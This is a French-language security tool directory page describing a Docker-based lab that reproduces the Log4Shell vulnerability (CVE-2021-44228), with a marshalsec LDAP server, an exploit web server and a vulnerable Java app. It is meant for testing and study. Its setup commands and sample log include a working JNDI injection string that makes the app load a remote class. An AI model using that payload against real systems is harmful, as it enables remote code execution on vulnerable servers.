Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228_Example — Environnement de reproduction basé sur Docker pour CVE-2021-44228 (Log4Shell) avec le serveur LDAP marshalsec, un serveur web d'exploitation et une application Java vulnérable pour tester l'injection JNDI. | Kitploit
Outils/GitHubGitHub/chilliwebs/cve-2021-44228_example
Analyse Dynamique (Sandboxing)Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications Web
GitHubchilliwebs/cve-2021-44228_example

CVE-2021-44228_Example

Environnement de reproduction basé sur Docker pour CVE-2021-44228 (Log4Shell) avec le serveur LDAP marshalsec, un serveur web d'exploitation et une application Java vulnérable pour tester l'injection JNDI.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 4 ansPas encore vérifié

CVE-2021-44228_Example

Exécutez chacune des 3 sections dans un onglet/console séparé

Serveur LDAP marshalsec https://github.com/chilliwebs/marshalsec (Forké depuis https://github.com/mbechler/marshalsec)

root@kitploit:~
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec

Le serveur web d'exploitation

root@kitploit:~
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit

L'application java cobaye (exécutant des versions vulnérables de java et Log4J)

root@kitploit:~
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig

Lors de l'exécution de guinea_pig, vous devriez voir les logs suivants :

root@kitploit:~
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}

"PWND!" est enregistré depuis une classe injectée de l'extérieur (Exploit)

Télécharger l’outil